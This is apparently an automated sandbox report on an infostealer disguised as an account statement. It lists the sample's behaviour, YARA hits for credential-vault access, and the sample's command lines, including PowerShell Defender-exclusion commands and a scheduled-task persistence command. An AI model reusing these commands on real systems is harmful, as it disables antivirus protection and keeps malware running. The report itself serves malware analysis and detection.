                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01263EB08_2_01263EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012641F88_2_012641F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0126F6D08_2_0126F6D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069000408_2_06900040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069068088_2_06906808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0690E9A78_2_0690E9A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069089408_2_06908940
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0690B4F08_2_0690B4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069034F88_2_069034F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_06909D608_2_06909D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0690AE108_2_0690AE10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069090478_2_06909047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_06905AF88_2_06905AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_069000078_2_06900007
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_00AADC749_2_00AADC74
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D71909_2_023D7190
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D64E89_2_023D64E8
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D88389_2_023D8838
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D69209_2_023D6920
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D59E09_2_023D59E0
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023D6D589_2_023D6D58
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 9_2_023DEDB89_2_023DEDB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C94AC813_2_00C94AC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C9CE8813_2_00C9CE88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C93EB013_2_00C93EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C941F813_2_00C941F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C9F6D013_2_00C9F6D0
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2145510029.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename32633afe-7a30-4194-b5fc-3a5fc4fdc868.exe4 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2146566265.0000000008930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2137873922.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.0000000004C75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000000.2100247241.0000000000E0E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezzUBZ.exe< vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename32633afe-7a30-4194-b5fc-3a5fc4fdc868.exe4 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeBinary or memory string: OriginalFilenamezzUBZ.exe< vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TgfQNrhQjjseHY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, xKKRJ8VTFX4G1N1xGX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, xKKRJ8VTFX4G1N1xGX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, xKKRJ8VTFX4G1N1xGX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@19/15@2/2
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMutant created: \Sessions\1\BaseNamedObjects\jHHFqVAHBkOyEUsNGAVZyWFA
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC678.tmpJump to behavior
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeReversingLabs: Detection: 36%
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeString found in binary or memory: Save/Load
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile read: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
